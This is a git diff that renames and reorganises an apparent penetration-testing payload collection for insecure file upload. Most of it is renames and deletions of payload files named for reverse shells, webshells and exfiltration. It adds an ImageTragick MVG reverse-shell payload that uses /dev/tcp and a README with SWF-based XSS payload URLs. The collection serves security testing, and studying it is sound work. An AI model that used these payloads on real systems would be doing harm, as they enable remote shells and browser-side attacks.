diff --git a/Upload insecure files/Eicar/eicar.com.txt b/Upload insecure files/CVE Eicar/eicar.com.txt
similarity index 100%
rename from Upload insecure files/Eicar/eicar.com.txt
rename to Upload insecure files/CVE Eicar/eicar.com.txt
diff --git a/Upload insecure files/Ffmpeg HLS/README.md b/Upload insecure files/CVE Ffmpeg HLS/README.md
similarity index 100%
rename from Upload insecure files/Ffmpeg HLS/README.md
rename to Upload insecure files/CVE Ffmpeg HLS/README.md
diff --git a/Upload insecure files/Ffmpeg HLS/gen_avi_bypass.py b/Upload insecure files/CVE Ffmpeg HLS/gen_avi_bypass.py
similarity index 100%
rename from Upload insecure files/Ffmpeg HLS/gen_avi_bypass.py
rename to Upload insecure files/CVE Ffmpeg HLS/gen_avi_bypass.py
diff --git a/Upload insecure files/Ffmpeg HLS/gen_xbin_avi.py b/Upload insecure files/CVE Ffmpeg HLS/gen_xbin_avi.py
similarity index 100%
rename from Upload insecure files/Ffmpeg HLS/gen_xbin_avi.py
rename to Upload insecure files/CVE Ffmpeg HLS/gen_xbin_avi.py
diff --git a/Upload insecure files/Ffmpeg HLS/read_passwd.avi b/Upload insecure files/CVE Ffmpeg HLS/read_passwd.avi
similarity index 100%
rename from Upload insecure files/Ffmpeg HLS/read_passwd.avi
rename to Upload insecure files/CVE Ffmpeg HLS/read_passwd.avi
diff --git a/Upload insecure files/Ffmpeg HLS/read_passwd_bypass.mp4 b/Upload insecure files/CVE Ffmpeg HLS/read_passwd_bypass.mp4
similarity index 100%
rename from Upload insecure files/Ffmpeg HLS/read_passwd_bypass.mp4
rename to Upload insecure files/CVE Ffmpeg HLS/read_passwd_bypass.mp4
diff --git a/Upload insecure files/Ffmpeg HLS/read_shadow.avi b/Upload insecure files/CVE Ffmpeg HLS/read_shadow.avi
similarity index 100%
rename from Upload insecure files/Ffmpeg HLS/read_shadow.avi
rename to Upload insecure files/CVE Ffmpeg HLS/read_shadow.avi
diff --git a/Upload insecure files/Ffmpeg HLS/read_shadow_bypass.mp4 b/Upload insecure files/CVE Ffmpeg HLS/read_shadow_bypass.mp4
similarity index 100%
rename from Upload insecure files/Ffmpeg HLS/read_shadow_bypass.mp4
rename to Upload insecure files/CVE Ffmpeg HLS/read_shadow_bypass.mp4
diff --git a/Upload insecure files/Image Tragik 2/README.md b/Upload insecure files/CVE Image Tragik/README.md
similarity index 50%
rename from Upload insecure files/Image Tragik 2/README.md
rename to Upload insecure files/CVE Image Tragik/README.md
index 206fcf9..98e51af 100644
--- a/Upload insecure files/Image Tragik 2/README.md	
+++ b/Upload insecure files/CVE Image Tragik/README.md	
@@ -1,6 +1,22 @@
-# Image Tragik 2
+# Image Tragik 1 & 2
 
-## Exploit
+
+## Exploit v1
+
+Simple reverse shell
+
+```powershell
+push graphic-context
+encoding "UTF-8"
+viewbox 0 0 1 1
+affine 1 0 0 1 0 0
+push graphic-context
+image Over 0,0 1,1 '|/bin/sh -i > /dev/tcp/ip/80 0<&1 2>&1'
+pop graphic-context
+pop graphic-context
+```
+
+## Exploit v2
 
 Simple `id` payload
 
diff --git a/Upload insecure files/Image Tragik/payload_imageover_file_exfiltration_pangu_wrapper.jpg b/Upload insecure files/CVE Image Tragik/imagetragik1_payload_imageover_file_exfiltration_pangu_wrapper.jpg
similarity index 100%
rename from Upload insecure files/Image Tragik/payload_imageover_file_exfiltration_pangu_wrapper.jpg
rename to Upload insecure files/CVE Image Tragik/imagetragik1_payload_imageover_file_exfiltration_pangu_wrapper.jpg
diff --git a/Upload insecure files/Image Tragik/payload_imageover_file_exfiltration_text_wrapper.jpg b/Upload insecure files/CVE Image Tragik/imagetragik1_payload_imageover_file_exfiltration_text_wrapper.jpg
similarity index 100%
rename from Upload insecure files/Image Tragik/payload_imageover_file_exfiltration_text_wrapper.jpg
rename to Upload insecure files/CVE Image Tragik/imagetragik1_payload_imageover_file_exfiltration_text_wrapper.jpg
diff --git a/Upload insecure files/Image Tragik/payload_imageover_reverse_shell_devtcp.jpg b/Upload insecure files/CVE Image Tragik/imagetragik1_payload_imageover_reverse_shell_devtcp.jpg
similarity index 100%
rename from Upload insecure files/Image Tragik/payload_imageover_reverse_shell_devtcp.jpg
rename to Upload insecure files/CVE Image Tragik/imagetragik1_payload_imageover_reverse_shell_devtcp.jpg
diff --git a/Upload insecure files/Image Tragik/payload_imageover_reverse_shell_netcat_fifo.png b/Upload insecure files/CVE Image Tragik/imagetragik1_payload_imageover_reverse_shell_netcat_fifo.png
similarity index 100%
rename from Upload insecure files/Image Tragik/payload_imageover_reverse_shell_netcat_fifo.png
rename to Upload insecure files/CVE Image Tragik/imagetragik1_payload_imageover_reverse_shell_netcat_fifo.png
diff --git a/Upload insecure files/Image Tragik/payload_imageover_wget.gif b/Upload insecure files/CVE Image Tragik/imagetragik1_payload_imageover_wget.gif
similarity index 100%
rename from Upload insecure files/Image Tragik/payload_imageover_wget.gif
rename to Upload insecure files/CVE Image Tragik/imagetragik1_payload_imageover_wget.gif
diff --git a/Upload insecure files/Image Tragik/payload_url_bind_shell_nc.mvg b/Upload insecure files/CVE Image Tragik/imagetragik1_payload_url_bind_shell_nc.mvg
similarity index 100%
rename from Upload insecure files/Image Tragik/payload_url_bind_shell_nc.mvg
rename to Upload insecure files/CVE Image Tragik/imagetragik1_payload_url_bind_shell_nc.mvg
diff --git a/Upload insecure files/Image Tragik/payload_url_curl.png b/Upload insecure files/CVE Image Tragik/imagetragik1_payload_url_curl.png
similarity index 100%
rename from Upload insecure files/Image Tragik/payload_url_curl.png
rename to Upload insecure files/CVE Image Tragik/imagetragik1_payload_url_curl.png
diff --git a/Upload insecure files/Image Tragik/payload_url_portscan.jpg b/Upload insecure files/CVE Image Tragik/imagetragik1_payload_url_portscan.jpg
similarity index 100%
rename from Upload insecure files/Image Tragik/payload_url_portscan.jpg
rename to Upload insecure files/CVE Image Tragik/imagetragik1_payload_url_portscan.jpg
diff --git a/Upload insecure files/Image Tragik/payload_url_remote_connection.mvg b/Upload insecure files/CVE Image Tragik/imagetragik1_payload_url_remote_connection.mvg
similarity index 100%
rename from Upload insecure files/Image Tragik/payload_url_remote_connection.mvg
rename to Upload insecure files/CVE Image Tragik/imagetragik1_payload_url_remote_connection.mvg
diff --git a/Upload insecure files/Image Tragik/payload_url_reverse_shell_bash.mvg b/Upload insecure files/CVE Image Tragik/imagetragik1_payload_url_reverse_shell_bash.mvg
similarity index 100%
rename from Upload insecure files/Image Tragik/payload_url_reverse_shell_bash.mvg
rename to Upload insecure files/CVE Image Tragik/imagetragik1_payload_url_reverse_shell_bash.mvg
diff --git a/Upload insecure files/Image Tragik/payload_url_touch.jpg b/Upload insecure files/CVE Image Tragik/imagetragik1_payload_url_touch.jpg
similarity index 100%
rename from Upload insecure files/Image Tragik/payload_url_touch.jpg
rename to Upload insecure files/CVE Image Tragik/imagetragik1_payload_url_touch.jpg
diff --git a/Upload insecure files/Image Tragik/payload_xml_reverse_shell_nctraditional.xml b/Upload insecure files/CVE Image Tragik/imagetragik1_payload_xml_reverse_shell_nctraditional.xml
similarity index 100%
rename from Upload insecure files/Image Tragik/payload_xml_reverse_shell_nctraditional.xml
rename to Upload insecure files/CVE Image Tragik/imagetragik1_payload_xml_reverse_shell_nctraditional.xml
diff --git a/Upload insecure files/Image Tragik/payload_xml_reverse_shell_netcat_encoded.xml b/Upload insecure files/CVE Image Tragik/imagetragik1_payload_xml_reverse_shell_netcat_encoded.xml
similarity index 100%
rename from Upload insecure files/Image Tragik/payload_xml_reverse_shell_netcat_encoded.xml
rename to Upload insecure files/CVE Image Tragik/imagetragik1_payload_xml_reverse_shell_netcat_encoded.xml
diff --git a/Upload insecure files/Image Tragik 2/centos_id.jpg b/Upload insecure files/CVE Image Tragik/imagetragik2_centos_id.jpg
similarity index 100%
rename from Upload insecure files/Image Tragik 2/centos_id.jpg
rename to Upload insecure files/CVE Image Tragik/imagetragik2_centos_id.jpg
diff --git a/Upload insecure files/Image Tragik 2/ubuntu_id.jpg b/Upload insecure files/CVE Image Tragik/imagetragik2_ubuntu_id.jpg
similarity index 100%
rename from Upload insecure files/Image Tragik 2/ubuntu_id.jpg
rename to Upload insecure files/CVE Image Tragik/imagetragik2_ubuntu_id.jpg
diff --git a/Upload insecure files/Image Tragik 2/ubuntu_shell.jpg b/Upload insecure files/CVE Image Tragik/imagetragik2_ubuntu_shell.jpg
similarity index 100%
rename from Upload insecure files/Image Tragik 2/ubuntu_shell.jpg
rename to Upload insecure files/CVE Image Tragik/imagetragik2_ubuntu_shell.jpg
diff --git a/Upload insecure files/ZIP Symbolic Link/etc_passwd.zip b/Upload insecure files/CVE ZIP Symbolic Link/etc_passwd.zip
similarity index 100%
rename from Upload insecure files/ZIP Symbolic Link/etc_passwd.zip
rename to Upload insecure files/CVE ZIP Symbolic Link/etc_passwd.zip
diff --git a/Upload insecure files/ZIP Symbolic Link/generate.sh b/Upload insecure files/CVE ZIP Symbolic Link/generate.sh
similarity index 100%
rename from Upload insecure files/ZIP Symbolic Link/generate.sh
rename to Upload insecure files/CVE ZIP Symbolic Link/generate.sh
diff --git a/Upload insecure files/ZIP Symbolic Link/passwd b/Upload insecure files/CVE ZIP Symbolic Link/passwd
similarity index 100%
rename from Upload insecure files/ZIP Symbolic Link/passwd
rename to Upload insecure files/CVE ZIP Symbolic Link/passwd
diff --git a/Upload insecure files/PHP .htaccess/.htaccess b/Upload insecure files/Configuration Apache .htaccess/.htaccess
similarity index 100%
rename from Upload insecure files/PHP .htaccess/.htaccess
rename to Upload insecure files/Configuration Apache .htaccess/.htaccess
diff --git a/Upload insecure files/PHP .htaccess/README.md b/Upload insecure files/Configuration Apache .htaccess/README.md
similarity index 100%
rename from Upload insecure files/PHP .htaccess/README.md
rename to Upload insecure files/Configuration Apache .htaccess/README.md
diff --git a/Upload insecure files/Busybox httpd.conf/README.md b/Upload insecure files/Configuration Busybox httpd.conf/README.md
similarity index 100%
rename from Upload insecure files/Busybox httpd.conf/README.md
rename to Upload insecure files/Configuration Busybox httpd.conf/README.md
diff --git a/Upload insecure files/Busybox httpd.conf/httpd.conf b/Upload insecure files/Configuration Busybox httpd.conf/httpd.conf
similarity index 100%
rename from Upload insecure files/Busybox httpd.conf/httpd.conf
rename to Upload insecure files/Configuration Busybox httpd.conf/httpd.conf
diff --git a/Upload insecure files/Busybox httpd.conf/shellymcshellface.sh b/Upload insecure files/Configuration Busybox httpd.conf/shellymcshellface.sh
similarity index 100%
rename from Upload insecure files/Busybox httpd.conf/shellymcshellface.sh
rename to Upload insecure files/Configuration Busybox httpd.conf/shellymcshellface.sh
diff --git a/Upload insecure files/IIS Web Config/web.config b/Upload insecure files/Configuration IIS web.config/web.config
similarity index 100%
rename from Upload insecure files/IIS Web Config/web.config
rename to Upload insecure files/Configuration IIS web.config/web.config
diff --git a/Upload insecure files/Python __init__.py/python-admin-__init__.py.zip b/Upload insecure files/Configuration Python __init__.py/python-admin-__init__.py.zip
similarity index 100%
rename from Upload insecure files/Python __init__.py/python-admin-__init__.py.zip
rename to Upload insecure files/Configuration Python __init__.py/python-admin-__init__.py.zip
diff --git a/Upload insecure files/Python __init__.py/python-conf-__init__.py.zip b/Upload insecure files/Configuration Python __init__.py/python-conf-__init__.py.zip
similarity index 100%
rename from Upload insecure files/Python __init__.py/python-conf-__init__.py.zip
rename to Upload insecure files/Configuration Python __init__.py/python-conf-__init__.py.zip
diff --git a/Upload insecure files/Python __init__.py/python-config-__init__.py.zip b/Upload insecure files/Configuration Python __init__.py/python-config-__init__.py.zip
similarity index 100%
rename from Upload insecure files/Python __init__.py/python-config-__init__.py.zip
rename to Upload insecure files/Configuration Python __init__.py/python-config-__init__.py.zip
diff --git a/Upload insecure files/Python __init__.py/python-controllers-__init__.py.zip b/Upload insecure files/Configuration Python __init__.py/python-controllers-__init__.py.zip
similarity index 100%
rename from Upload insecure files/Python __init__.py/python-controllers-__init__.py.zip
rename to Upload insecure files/Configuration Python __init__.py/python-controllers-__init__.py.zip
diff --git a/Upload insecure files/Python __init__.py/python-generate-init.py b/Upload insecure files/Configuration Python __init__.py/python-generate-init.py
similarity index 100%
rename from Upload insecure files/Python __init__.py/python-generate-init.py
rename to Upload insecure files/Configuration Python __init__.py/python-generate-init.py
diff --git a/Upload insecure files/Python __init__.py/python-login-__init__.py.zip b/Upload insecure files/Configuration Python __init__.py/python-login-__init__.py.zip
similarity index 100%
rename from Upload insecure files/Python __init__.py/python-login-__init__.py.zip
rename to Upload insecure files/Configuration Python __init__.py/python-login-__init__.py.zip
diff --git a/Upload insecure files/Python __init__.py/python-models-__init__.py.zip b/Upload insecure files/Configuration Python __init__.py/python-models-__init__.py.zip
similarity index 100%
rename from Upload insecure files/Python __init__.py/python-models-__init__.py.zip
rename to Upload insecure files/Configuration Python __init__.py/python-models-__init__.py.zip
diff --git a/Upload insecure files/Python __init__.py/python-modules-__init__.py.zip b/Upload insecure files/Configuration Python __init__.py/python-modules-__init__.py.zip
similarity index 100%
rename from Upload insecure files/Python __init__.py/python-modules-__init__.py.zip
rename to Upload insecure files/Configuration Python __init__.py/python-modules-__init__.py.zip
diff --git a/Upload insecure files/Python __init__.py/python-scripts-__init__.py.zip b/Upload insecure files/Configuration Python __init__.py/python-scripts-__init__.py.zip
similarity index 100%
rename from Upload insecure files/Python __init__.py/python-scripts-__init__.py.zip
rename to Upload insecure files/Configuration Python __init__.py/python-scripts-__init__.py.zip
diff --git a/Upload insecure files/Python __init__.py/python-settings-__init__.py.zip b/Upload insecure files/Configuration Python __init__.py/python-settings-__init__.py.zip
similarity index 100%
rename from Upload insecure files/Python __init__.py/python-settings-__init__.py.zip
rename to Upload insecure files/Configuration Python __init__.py/python-settings-__init__.py.zip
diff --git a/Upload insecure files/Python __init__.py/python-tests-__init__.py.zip b/Upload insecure files/Configuration Python __init__.py/python-tests-__init__.py.zip
similarity index 100%
rename from Upload insecure files/Python __init__.py/python-tests-__init__.py.zip
rename to Upload insecure files/Configuration Python __init__.py/python-tests-__init__.py.zip
diff --git a/Upload insecure files/Python __init__.py/python-urls-__init__.py.zip b/Upload insecure files/Configuration Python __init__.py/python-urls-__init__.py.zip
similarity index 100%
rename from Upload insecure files/Python __init__.py/python-urls-__init__.py.zip
rename to Upload insecure files/Configuration Python __init__.py/python-urls-__init__.py.zip
diff --git a/Upload insecure files/Python __init__.py/python-utils-__init__.py.zip b/Upload insecure files/Configuration Python __init__.py/python-utils-__init__.py.zip
similarity index 100%
rename from Upload insecure files/Python __init__.py/python-utils-__init__.py.zip
rename to Upload insecure files/Configuration Python __init__.py/python-utils-__init__.py.zip
diff --git a/Upload insecure files/Python __init__.py/python-view-__init__.py.zip b/Upload insecure files/Configuration Python __init__.py/python-view-__init__.py.zip
similarity index 100%
rename from Upload insecure files/Python __init__.py/python-view-__init__.py.zip
rename to Upload insecure files/Configuration Python __init__.py/python-view-__init__.py.zip
diff --git a/Upload insecure files/Extension Flash/README.md b/Upload insecure files/Extension Flash/README.md
new file mode 100644
index 0000000..bd5e8b5
--- /dev/null
+++ b/Upload insecure files/Extension Flash/README.md	
@@ -0,0 +1,12 @@
+### XSS via SWF
+
+As you may already know, it is possible to make a website vulnerable to XSS if you can upload/include a SWF file into that website. I am going to represent this SWF file that you can use in your PoCs.
+This method is based on [1] and [2], and it has been tested in Google Chrome, Mozilla Firefox, IE9/8; there should not be any problem with other browsers either.
+
+```powershell
+Browsers other than IE: http://0me.me/demo/xss/xssproject.swf?js=alert(document.domain);
+
+IE8: http://0me.me/demo/xss/xssproject.swf?js=try{alert(document.domain)}catch(e){ window.open(‘?js=history.go(-1)’,’_self’);}
+
+IE9: http://0me.me/demo/xss/xssproject.swf?js=w=window.open(‘invalidfileinvalidfileinvalidfile’,’target’);setTimeout(‘alert(w.document.location);w.close();’,1);
+```
\ No newline at end of file
diff --git a/Upload insecure files/Insecure Flash/xss.swf b/Upload insecure files/Extension Flash/xss.swf
similarity index 100%
rename from Upload insecure files/Insecure Flash/xss.swf
rename to Upload insecure files/Extension Flash/xss.swf
diff --git a/Upload insecure files/Insecure Flash/xssproject.swf b/Upload insecure files/Extension Flash/xssproject.swf
similarity index 100%
rename from Upload insecure files/Insecure Flash/xssproject.swf
rename to Upload insecure files/Extension Flash/xssproject.swf
diff --git a/Upload insecure files/PDF JS/poc.js b/Upload insecure files/Extension PDF JS/poc.js
similarity index 100%
rename from Upload insecure files/PDF JS/poc.js
rename to Upload insecure files/Extension PDF JS/poc.js
diff --git a/Upload insecure files/PDF JS/poc.py b/Upload insecure files/Extension PDF JS/poc.py
similarity index 100%
rename from Upload insecure files/PDF JS/poc.py
rename to Upload insecure files/Extension PDF JS/poc.py
diff --git a/Upload insecure files/PDF JS/result.pdf b/Upload insecure files/Extension PDF JS/result.pdf
similarity index 100%
rename from Upload insecure files/PDF JS/result.pdf
rename to Upload insecure files/Extension PDF JS/result.pdf
diff --git a/Upload insecure files/PHP Extension/phpinfo.jpg.php b/Upload insecure files/Extension PHP/phpinfo.jpg.php
similarity index 100%
rename from Upload insecure files/PHP Extension/phpinfo.jpg.php
rename to Upload insecure files/Extension PHP/phpinfo.jpg.php
diff --git a/Upload insecure files/PHP Extension/phpinfo.phar b/Upload insecure files/Extension PHP/phpinfo.phar
similarity index 100%
rename from Upload insecure files/PHP Extension/phpinfo.phar
rename to Upload insecure files/Extension PHP/phpinfo.phar
diff --git a/Upload insecure files/PHP Extension/phpinfo.php b/Upload insecure files/Extension PHP/phpinfo.php
similarity index 100%
rename from Upload insecure files/PHP Extension/phpinfo.php
rename to Upload insecure files/Extension PHP/phpinfo.php
diff --git a/Upload insecure files/PHP Extension/phpinfo.php3 b/Upload insecure files/Extension PHP/phpinfo.php3
similarity index 100%
rename from Upload insecure files/PHP Extension/phpinfo.php3
rename to Upload insecure files/Extension PHP/phpinfo.php3
diff --git a/Upload insecure files/PHP Extension/phpinfo.php4 b/Upload insecure files/Extension PHP/phpinfo.php4
similarity index 100%
rename from Upload insecure files/PHP Extension/phpinfo.php4
rename to Upload insecure files/Extension PHP/phpinfo.php4
diff --git a/Upload insecure files/PHP Extension/phpinfo.php5 b/Upload insecure files/Extension PHP/phpinfo.php5
similarity index 100%
rename from Upload insecure files/PHP Extension/phpinfo.php5
rename to Upload insecure files/Extension PHP/phpinfo.php5
diff --git a/Upload insecure files/PHP Extension/phpinfo.php7 b/Upload insecure files/Extension PHP/phpinfo.php7
similarity index 100%
rename from Upload insecure files/PHP Extension/phpinfo.php7
rename to Upload insecure files/Extension PHP/phpinfo.php7
diff --git a/Upload insecure files/PHP Extension/phpinfo.phpt b/Upload insecure files/Extension PHP/phpinfo.phpt
similarity index 100%
rename from Upload insecure files/PHP Extension/phpinfo.phpt
rename to Upload insecure files/Extension PHP/phpinfo.phpt
diff --git a/Upload insecure files/PHP Extension/phpinfo.pht b/Upload insecure files/Extension PHP/phpinfo.pht
similarity index 100%
rename from Upload insecure files/PHP Extension/phpinfo.pht
rename to Upload insecure files/Extension PHP/phpinfo.pht
diff --git a/Upload insecure files/PHP Extension/phpinfo.phtml b/Upload insecure files/Extension PHP/phpinfo.phtml
similarity index 100%
rename from Upload insecure files/PHP Extension/phpinfo.phtml
rename to Upload insecure files/Extension PHP/phpinfo.phtml
diff --git a/Upload insecure files/PHP Extension/shell.jpeg.php b/Upload insecure files/Extension PHP/shell.jpeg.php
similarity index 100%
rename from Upload insecure files/PHP Extension/shell.jpeg.php
rename to Upload insecure files/Extension PHP/shell.jpeg.php
diff --git a/Upload insecure files/PHP Extension/shell.jpg.php b/Upload insecure files/Extension PHP/shell.jpg.php
similarity index 100%
rename from Upload insecure files/PHP Extension/shell.jpg.php
rename to Upload insecure files/Extension PHP/shell.jpg.php
diff --git a/Upload insecure files/PHP Extension/shell.pgif b/Upload insecure files/Extension PHP/shell.pgif
similarity index 100%
rename from Upload insecure files/PHP Extension/shell.pgif
rename to Upload insecure files/Extension PHP/shell.pgif
diff --git a/Upload insecure files/PHP Extension/shell.phar b/Upload insecure files/Extension PHP/shell.phar
similarity index 100%
rename from Upload insecure files/PHP Extension/shell.phar
rename to Upload insecure files/Extension PHP/shell.phar
diff --git a/Upload insecure files/PHP Extension/shell.php b/Upload insecure files/Extension PHP/shell.php
similarity index 100%
rename from Upload insecure files/PHP Extension/shell.php
rename to Upload insecure files/Extension PHP/shell.php
diff --git a/Upload insecure files/PHP Extension/shell.php3 b/Upload insecure files/Extension PHP/shell.php3
similarity index 100%
rename from Upload insecure files/PHP Extension/shell.php3
rename to Upload insecure files/Extension PHP/shell.php3
diff --git a/Upload insecure files/PHP Extension/shell.php4 b/Upload insecure files/Extension PHP/shell.php4
similarity index 100%
rename from Upload insecure files/PHP Extension/shell.php4
rename to Upload insecure files/Extension PHP/shell.php4
diff --git a/Upload insecure files/PHP Extension/shell.php5 b/Upload insecure files/Extension PHP/shell.php5
similarity index 100%
rename from Upload insecure files/PHP Extension/shell.php5
rename to Upload insecure files/Extension PHP/shell.php5
diff --git a/Upload insecure files/PHP Extension/shell.php7 b/Upload insecure files/Extension PHP/shell.php7
similarity index 100%
rename from Upload insecure files/PHP Extension/shell.php7
rename to Upload insecure files/Extension PHP/shell.php7
diff --git a/Upload insecure files/PHP Extension/shell.phpt b/Upload insecure files/Extension PHP/shell.phpt
similarity index 100%
rename from Upload insecure files/PHP Extension/shell.phpt
rename to Upload insecure files/Extension PHP/shell.phpt
diff --git a/Upload insecure files/PHP Extension/shell.pht b/Upload insecure files/Extension PHP/shell.pht
similarity index 100%
rename from Upload insecure files/PHP Extension/shell.pht
rename to Upload insecure files/Extension PHP/shell.pht
diff --git a/Upload insecure files/PHP Extension/shell.phtml b/Upload insecure files/Extension PHP/shell.phtml
similarity index 100%
rename from Upload insecure files/PHP Extension/shell.phtml
rename to Upload insecure files/Extension PHP/shell.phtml
diff --git a/Upload insecure files/PHP Extension/shell.png.php b/Upload insecure files/Extension PHP/shell.png.php
similarity index 100%
rename from Upload insecure files/PHP Extension/shell.png.php
rename to Upload insecure files/Extension PHP/shell.png.php
diff --git a/Upload insecure files/JPG Resize/exploit--1.jpg b/Upload insecure files/JPG Resize/exploit--1.jpg
deleted file mode 100755
index 05fc5e1..0000000
Binary files a/Upload insecure files/JPG Resize/exploit--1.jpg and /dev/null differ
diff --git a/Upload insecure files/JPG Resize/exploit-52.jpg b/Upload insecure files/JPG Resize/exploit-52.jpg
deleted file mode 100755
index f149d94..0000000
Binary files a/Upload insecure files/JPG Resize/exploit-52.jpg and /dev/null differ
diff --git a/Upload insecure files/JPG Resize/exploit-53.jpg b/Upload insecure files/JPG Resize/exploit-53.jpg
deleted file mode 100755
index 7103e0e..0000000
Binary files a/Upload insecure files/JPG Resize/exploit-53.jpg and /dev/null differ
diff --git a/Upload insecure files/JPG Resize/exploit-54.jpg b/Upload insecure files/JPG Resize/exploit-54.jpg
deleted file mode 100755
index c454dee..0000000
Binary files a/Upload insecure files/JPG Resize/exploit-54.jpg and /dev/null differ
diff --git a/Upload insecure files/JPG Resize/exploit-56.jpg b/Upload insecure files/JPG Resize/exploit-56.jpg
deleted file mode 100755
index 30479c8..0000000
Binary files a/Upload insecure files/JPG Resize/exploit-56.jpg and /dev/null differ
diff --git a/Upload insecure files/JPG Resize/exploit-57.jpg b/Upload insecure files/JPG Resize/exploit-57.jpg
deleted file mode 100755
index 0633c9b..0000000
Binary files a/Upload insecure files/JPG Resize/exploit-57.jpg and /dev/null differ
diff --git a/Upload insecure files/JPG Resize/exploit-58.jpg b/Upload insecure files/JPG Resize/exploit-58.jpg
deleted file mode 100755
index e9357de..0000000
Binary files a/Upload insecure files/JPG Resize/exploit-58.jpg and /dev/null differ
diff --git a/Upload insecure files/JPG Resize/exploit-59.jpg b/Upload insecure files/JPG Resize/exploit-59.jpg
deleted file mode 100755
index 8ccd2e1..0000000
Binary files a/Upload insecure files/JPG Resize/exploit-59.jpg and /dev/null differ
diff --git a/Upload insecure files/JPG Resize/exploit-60.jpg b/Upload insecure files/JPG Resize/exploit-60.jpg
deleted file mode 100755
index e541cdd..0000000
Binary files a/Upload insecure files/JPG Resize/exploit-60.jpg and /dev/null differ
diff --git a/Upload insecure files/JPG Resize/exploit-61.jpg b/Upload insecure files/JPG Resize/exploit-61.jpg
deleted file mode 100755
index 0c32026..0000000
Binary files a/Upload insecure files/JPG Resize/exploit-61.jpg and /dev/null differ
diff --git a/Upload insecure files/JPG Resize/exploit-62.jpg b/Upload insecure files/JPG Resize/exploit-62.jpg
deleted file mode 100755
index f3144db..0000000
Binary files a/Upload insecure files/JPG Resize/exploit-62.jpg and /dev/null differ
diff --git a/Upload insecure files/JPG Resize/exploit-63.jpg b/Upload insecure files/JPG Resize/exploit-63.jpg
deleted file mode 100755
index 978d5d7..0000000
Binary files a/Upload insecure files/JPG Resize/exploit-63.jpg and /dev/null differ
diff --git a/Upload insecure files/JPG Resize/exploit-64.jpg b/Upload insecure files/JPG Resize/exploit-64.jpg
deleted file mode 100755
index d6bb05c..0000000
Binary files a/Upload insecure files/JPG Resize/exploit-64.jpg and /dev/null differ
diff --git a/Upload insecure files/JPG Resize/exploit-65.jpg b/Upload insecure files/JPG Resize/exploit-65.jpg
deleted file mode 100755
index 406801d..0000000
Binary files a/Upload insecure files/JPG Resize/exploit-65.jpg and /dev/null differ
diff --git a/Upload insecure files/JPG Resize/exploit-66.jpg b/Upload insecure files/JPG Resize/exploit-66.jpg
deleted file mode 100755
index 04a4c53..0000000
Binary files a/Upload insecure files/JPG Resize/exploit-66.jpg and /dev/null differ
diff --git a/Upload insecure files/JPG Resize/exploit-67.jpg b/Upload insecure files/JPG Resize/exploit-67.jpg
deleted file mode 100755
index 61aa5c6..0000000
Binary files a/Upload insecure files/JPG Resize/exploit-67.jpg and /dev/null differ
diff --git a/Upload insecure files/JPG Resize/exploit-68.jpg b/Upload insecure files/JPG Resize/exploit-68.jpg
deleted file mode 100755
index b5525e8..0000000
Binary files a/Upload insecure files/JPG Resize/exploit-68.jpg and /dev/null differ
diff --git a/Upload insecure files/JPG Resize/exploit-69.jpg b/Upload insecure files/JPG Resize/exploit-69.jpg
deleted file mode 100755
index 63b046b..0000000
Binary files a/Upload insecure files/JPG Resize/exploit-69.jpg and /dev/null differ
diff --git a/Upload insecure files/JPG Resize/exploit-70.jpg b/Upload insecure files/JPG Resize/exploit-70.jpg
deleted file mode 100755
index 24a2e01..0000000
Binary files a/Upload insecure files/JPG Resize/exploit-70.jpg and /dev/null differ
diff --git a/Upload insecure files/JPG Resize/exploit-71.jpg b/Upload insecure files/JPG Resize/exploit-71.jpg
deleted file mode 100755
index b81b241..0000000
Binary files a/Upload insecure files/JPG Resize/exploit-71.jpg and /dev/null differ
diff --git a/Upload insecure files/JPG Resize/exploit-72.jpg b/Upload insecure files/JPG Resize/exploit-72.jpg
deleted file mode 100755
index 64dae94..0000000
Binary files a/Upload insecure files/JPG Resize/exploit-72.jpg and /dev/null differ
diff --git a/Upload insecure files/JPG Resize/exploit-73.jpg b/Upload insecure files/JPG Resize/exploit-73.jpg
deleted file mode 100755
index 58f8c2d..0000000
Binary files a/Upload insecure files/JPG Resize/exploit-73.jpg and /dev/null differ
diff --git a/Upload insecure files/JPG Resize/exploit-74.jpg b/Upload insecure files/JPG Resize/exploit-74.jpg
deleted file mode 100755
index 57c10ff..0000000
Binary files a/Upload insecure files/JPG Resize/exploit-74.jpg and /dev/null differ
diff --git a/Upload insecure files/JPG Resize/exploit-75.jpg b/Upload insecure files/JPG Resize/exploit-75.jpg
deleted file mode 100755
index 224738b..0000000
Binary files a/Upload insecure files/JPG Resize/exploit-75.jpg and /dev/null differ
diff --git a/Upload insecure files/JPG Resize/exploit-76.jpg b/Upload insecure files/JPG Resize/exploit-76.jpg
deleted file mode 100755
index 2b2bc38..0000000
Binary files a/Upload insecure files/JPG Resize/exploit-76.jpg and /dev/null differ
diff --git a/Upload insecure files/JPG Resize/exploit-77.jpg b/Upload insecure files/JPG Resize/exploit-77.jpg
deleted file mode 100755
index 3b2b2c5..0000000
Binary files a/Upload insecure files/JPG Resize/exploit-77.jpg and /dev/null differ
diff --git a/Upload insecure files/JPG Resize/exploit-78.jpg b/Upload insecure files/JPG Resize/exploit-78.jpg
deleted file mode 100755
index 0027333..0000000
Binary files a/Upload insecure files/JPG Resize/exploit-78.jpg and /dev/null differ
diff --git a/Upload insecure files/JPG Resize/exploit-79.jpg b/Upload insecure files/JPG Resize/exploit-79.jpg
deleted file mode 100755
index eead64d..0000000
Binary files a/Upload insecure files/JPG Resize/exploit-79.jpg and /dev/null differ
diff --git a/Upload insecure files/JPG Resize/exploit-80.jpg b/Upload insecure files/JPG Resize/exploit-80.jpg
deleted file mode 100755
index 5f1a2f8..0000000
Binary files a/Upload insecure files/JPG Resize/exploit-80.jpg and /dev/null differ
diff --git a/Upload insecure files/JPG Resize/exploit-81.jpg b/Upload insecure files/JPG Resize/exploit-81.jpg
deleted file mode 100755
index 644fb2f..0000000
Binary files a/Upload insecure files/JPG Resize/exploit-81.jpg and /dev/null differ
diff --git a/Upload insecure files/JPG Resize/exploit-82.jpg b/Upload insecure files/JPG Resize/exploit-82.jpg
deleted file mode 100755
index d219eea..0000000
Binary files a/Upload insecure files/JPG Resize/exploit-82.jpg and /dev/null differ
diff --git a/Upload insecure files/JPG Resize/exploit-83.jpg b/Upload insecure files/JPG Resize/exploit-83.jpg
deleted file mode 100755
index 4f99d48..0000000
Binary files a/Upload insecure files/JPG Resize/exploit-83.jpg and /dev/null differ
diff --git a/Upload insecure files/JPG Resize/exploit-84.jpg b/Upload insecure files/JPG Resize/exploit-84.jpg
deleted file mode 100755
index 0913b78..0000000
Binary files a/Upload insecure files/JPG Resize/exploit-84.jpg and /dev/null differ
